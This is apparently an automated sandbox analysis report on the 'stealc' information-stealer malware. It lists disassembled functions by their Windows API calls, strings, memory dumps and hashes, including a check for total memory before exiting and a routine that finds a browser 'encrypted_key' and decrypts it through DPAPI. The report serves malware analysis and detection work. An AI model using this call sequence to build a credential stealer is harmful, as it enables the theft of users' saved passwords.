Opcode Fuzzy Hash: af3a2fe39ab491d1e5fcd1bfe99a71e102a52c8e1e18beda715c7891d79c6077
Instruction Fuzzy Hash: 530144B5A44208BFDB10DBE5DC8DFAD77B8EB44701F144169FE05FB290DA70A9088B51

Function 00CB7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB7734
HeapAlloc.KERNEL32(00000000), ref: 00CB773B
RegOpenKeyExA.KERNEL32(80000002,007FB700,00000000,00020119,00CB76B9), ref: 00CB775B
RegQueryValueExA.KERNEL32(00CB76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00CB777A
RegCloseKey.ADVAPI32(00CB76B9), ref: 00CB7784

Strings

CurrentBuildNumber, xrefs: 00CB7771

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 2d82a043c6e8cf8273e7a2a5a2f8c25d16b13ed35874e18251ef85856b40802e
Instruction ID: 663f5d3596724235892f6db32a38a5005ea2550102ea375f1cf93b54a8a4088d
Opcode Fuzzy Hash: 2d82a043c6e8cf8273e7a2a5a2f8c25d16b13ed35874e18251ef85856b40802e
Instruction Fuzzy Hash: 940144B5A40308BFDB10DBE1DC8AFAEB7B8EB44701F144169FA05BB281DA7066048B51

Function 00CB40B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00CB40D5
RegOpenKeyExA.KERNEL32(80000001,00800F58,00000000,00020119,?), ref: 00CB40F4
RegQueryValueExA.ADVAPI32(?,007FFD58,00000000,00000000,00000000,000000FF), ref: 00CB4118
RegCloseKey.ADVAPI32(?), ref: 00CB4122
lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00CB4147
lstrcatA.KERNEL32(?,007FFEC0), ref: 00CB415B

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 8d87021b02b693ca5eb5982dffab7ab414293633c9767f078fa1b63c4d84da60
Instruction ID: c886f74cba4ce98b5151d11aec858d6a056e021c2856e8e7939bbbafdc058ca6
Opcode Fuzzy Hash: 8d87021b02b693ca5eb5982dffab7ab414293633c9767f078fa1b63c4d84da60
Instruction Fuzzy Hash: 49418AB6D0014C6BDB14EBE0EC86FFE737DAB89300F04455DB6155B181EA75AB8C8B92

Function 00CA99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CA99EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CA9A11
LocalAlloc.KERNEL32(00000040,?), ref: 00CA9A31
ReadFile.KERNEL32(000000FF,?,00000000,00CB02E7,00000000), ref: 00CA9A5A
LocalFree.KERNEL32(00CB02E7), ref: 00CA9A90
CloseHandle.KERNEL32(000000FF), ref: 00CA9A9A

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: efdd63f073c4e7bc9a3e760307a37fec2d285dc8e7de44dd5092870a8ec56d45
Instruction ID: c97d364c59bc3a8122f4f838c25181a1a73ed81483dab789f30a396f91cca122
Opcode Fuzzy Hash: efdd63f073c4e7bc9a3e760307a37fec2d285dc8e7de44dd5092870a8ec56d45
Instruction Fuzzy Hash: 3F3138B4A0020AEFDB14CF95C886BAE77B5FF49304F108159E815AB290C774AE45DFA1

Function 00CA1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00CA123E
__aulldiv.LIBCMT ref: 00CA1258
__aulldiv.LIBCMT ref: 00CA1266
ExitProcess.KERNEL32 ref: 00CA1294

Strings

@, xrefs: 00CA1233

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: 4bfc715bfb9e6cd45f27daa75afa44d201c3afc62f8ec12a70bdc3e0300132a9
Instruction ID: 18c0551be2427dc2adb3d39c14e9ebe54fd9480f9ec65772b62405b8cf43309b
Opcode Fuzzy Hash: 4bfc715bfb9e6cd45f27daa75afa44d201c3afc62f8ec12a70bdc3e0300132a9
Instruction Fuzzy Hash: D5016DB0D40308BAEF10DBE0CC89B9EBB78AB04705F288158FB05BA2C0D774A6459799

Function 00CA9CE0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Part of subcall function 00CA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CA99EC
Part of subcall function 00CA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CA9A11
Part of subcall function 00CA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CA9A31
Part of subcall function 00CA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CB02E7,00000000), ref: 00CA9A5A
Part of subcall function 00CA99C0: LocalFree.KERNEL32(00CB02E7), ref: 00CA9A90
Part of subcall function 00CA99C0: CloseHandle.KERNEL32(000000FF), ref: 00CA9A9A

Part of subcall function 00CB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CB8E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00CA9D39

Part of subcall function 00CA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CA4EEE,00000000,00000000), ref: 00CA9AEF
Part of subcall function 00CA9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00CA4EEE,00000000,?), ref: 00CA9B01
Part of subcall function 00CA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CA4EEE,00000000,00000000), ref: 00CA9B2A
Part of subcall function 00CA9AC0: LocalFree.KERNEL32(?,?,?,?,00CA4EEE,00000000,?), ref: 00CA9B3F

memcmp.MSVCRT ref: 00CA9D92

Part of subcall function 00CA9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00CA9B84
Part of subcall function 00CA9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00CA9BA3
Part of subcall function 00CA9B60: memcpy.MSVCRT(?,?,?), ref: 00CA9BC6
Part of subcall function 00CA9B60: LocalFree.KERNEL32(?), ref: 00CA9BD3

Strings

, xrefs: 00CA9DC1
"encrypted_key":", xrefs: 00CA9D30
DPAPI, xrefs: 00CA9D89

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 3731072634-738592651
Opcode ID: 58b724a846633d31d1757053f6c628091a1a6f54db3cab4c04f355ef092c2180
Instruction ID: d664359abdff3d5eb3bc12fa99a702d2edd0136f95042dde5615f5f89f39f550
Opcode Fuzzy Hash: 58b724a846633d31d1757053f6c628091a1a6f54db3cab4c04f355ef092c2180
Instruction Fuzzy Hash: 1A313EB5D10209ABCB14DFE4DC86EEFB7B8FF49308F144529E915A7241EB309A44CBA1

Function 6BABC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6BABC947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6BABC969
GetSystemInfo.KERNEL32(?), ref: 6BABC9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6BABC9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6BABC9E2

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 3ed81e95502496c8cb650fe92da030cfaac7632d1253c02af0d0ba25a2580a28
Instruction ID: be166d03ee14d07e24692b5ceb108f5f3219dae93c3dc19944b7881411d62a36
Opcode Fuzzy Hash: 3ed81e95502496c8cb650fe92da030cfaac7632d1253c02af0d0ba25a2580a28
Instruction Fuzzy Hash: 9E21D432640218ABEF149B28CC84FBE73ADBB46740F50051FF912A7280EB75AC8087A1

Function 00CB7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB7E37
HeapAlloc.KERNEL32(00000000), ref: 00CB7E3E
RegOpenKeyExA.KERNEL32(80000002,007FB818,00000000,00020119,?), ref: 00CB7E5E
RegQueryValueExA.KERNEL32(?,00800C38,00000000,00000000,000000FF,000000FF), ref: 00CB7E7F
RegCloseKey.ADVAPI32(?), ref: 00CB7E92

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: d3b859d97f62a9b654fc42a4eb528affabcc184914e863d01d0e95efc6412bf0
Instruction ID: a15f77e00beaa1828c5bc14b5a47ced57db94d3ec240ad8655ec34a167a7f5ed
Opcode Fuzzy Hash: d3b859d97f62a9b654fc42a4eb528affabcc184914e863d01d0e95efc6412bf0
Instruction Fuzzy Hash: 721194B1A44249EFD714CFD6DC89FBBBBB8EB44701F10422DFA15AB280D77468048BA1

Function 00CA12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00CA12B4
HeapAlloc.KERNEL32(00000000), ref: 00CA12BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00CA12D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 00CA12F5
RegCloseKey.ADVAPI32(?), ref: 00CA12FF

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: ea29e1e93a5840bc3c0360c0735dc9f5002ef2b9b165d4175857cd5687937c4f
Instruction ID: de9de548f26861904f2bcc1f309ee3b7b405e84c84945b90735807b662b98526
Opcode Fuzzy Hash: ea29e1e93a5840bc3c0360c0735dc9f5002ef2b9b165d4175857cd5687937c4f
Instruction Fuzzy Hash: 310136B5A4020CBFDB14DFD1DC89FAEB7B8EB48701F048159FA05AB280D670AA058F51

Function 00CAA0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(007FD5D8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,00CB0153), ref: 00CAA0BD
LoadLibraryA.KERNEL32(00800D18,?,?,?,?,?,?,?,?,?,?,?,00CB0153), ref: 00CAA146

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Part of subcall function 00CBA820: lstrlenA.KERNEL32(00000000,?,?,00CB5B54,00CC0ADB,00CC0ADA,?,?,00CB6B16,00000000,?,007F1348,?,00CC110C,?,00000000), ref: 00CBA82B
Part of subcall function 00CBA820: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA885

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
